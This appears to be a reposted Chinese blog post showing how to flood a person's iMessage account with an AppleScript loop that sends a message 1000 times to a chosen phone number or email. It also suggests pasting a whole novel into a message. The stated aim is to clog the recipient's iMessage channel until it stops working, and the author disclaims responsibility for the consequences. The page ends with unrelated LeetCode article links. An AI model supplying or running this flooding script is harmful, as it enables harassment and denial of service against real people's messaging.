博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
如何通过APPLESCRIPT来狂发imessage(最简单的流程)
阅读量:4198 次
发布时间:2019-05-26

本文共 653 字,大约阅读时间需要 2 分钟。

111

本文只是提供方法,造成后果概不负责


收到iMessage广告是不是很烦?这个方法本身本身是一位网友想出来对付iMessage广告的

不过苹果iMessage也存在一个不小的漏洞,那就是如果你狂发iMessage给一个人,几千几万条的话,也会导致别人的iMessage通道赌塞,直接不能用了。或者,你在iMessage里面cmd+c,cmd+v一本小说,发给别人(方法源自@jack099),也会让别人的iMessage报废。

这里我就说一下Applescript的方法

打开APPLESCRIPT

输入以下代码

下面就是使用的代码了

tell application "Messages"        set myid to get id of first service            set theBuddy to buddy "电话号码/iM邮箱" of service id myid            repeat 1000 times       #1000是指次数,自定吧                send "iM内容" to theBuddy                end repeat        end tell

最后,run!

这招太损,造成的一切后果概不负责。

转自:http://easy1z.github.io/blog/2013/07/13/ru-he-tong-guo-applescriptlai-kuang-fa-imessage/

转载地址:http://ggwli.baihongyu.com/

你可能感兴趣的文章
【一天一道LeetCode】#48. Rotate Image
查看>>
【一天一道LeetCode】#56. Merge Intervals
查看>>
【一天一道LeetCode】#57. Insert Interval
查看>>
【一天一道LeetCode】#58. Length of Last Word
查看>>
【一天一道LeetCode】#59. Spiral Matrix II
查看>>
【一天一道LeetCode】#30. Substring with Concatenation of All Words
查看>>
【一天一道LeetCode】#60. Permutation Sequence.
查看>>
【一天一道LeetCode】#62. Unique Paths
查看>>
【一天一道LeetCode】#61. Rotate List
查看>>
【一天一道LeetCode】#63. Unique Paths II
查看>>
【一天一道LeetCode】#36. Valid Sudoku
查看>>
【一天一道LeetCode】#75. Sort Colors
查看>>
【一天一道LeetCode】#76. Minimum Window Substring
查看>>
【计算机网络 第五版】阅读笔记之一:概述
查看>>
【计算机网络 第五版】阅读笔记之二:物理层
查看>>
【计算机网络 第五版】阅读笔记之三:数据链路层
查看>>
【计算机网络 第五版】阅读笔记之四:网络层
查看>>
【计算机网络 第五版】阅读笔记之五:运输层
查看>>
【一天一道LeetCode】#77. Combinations
查看>>
【一天一道LeetCode】#78. Subsets
查看>>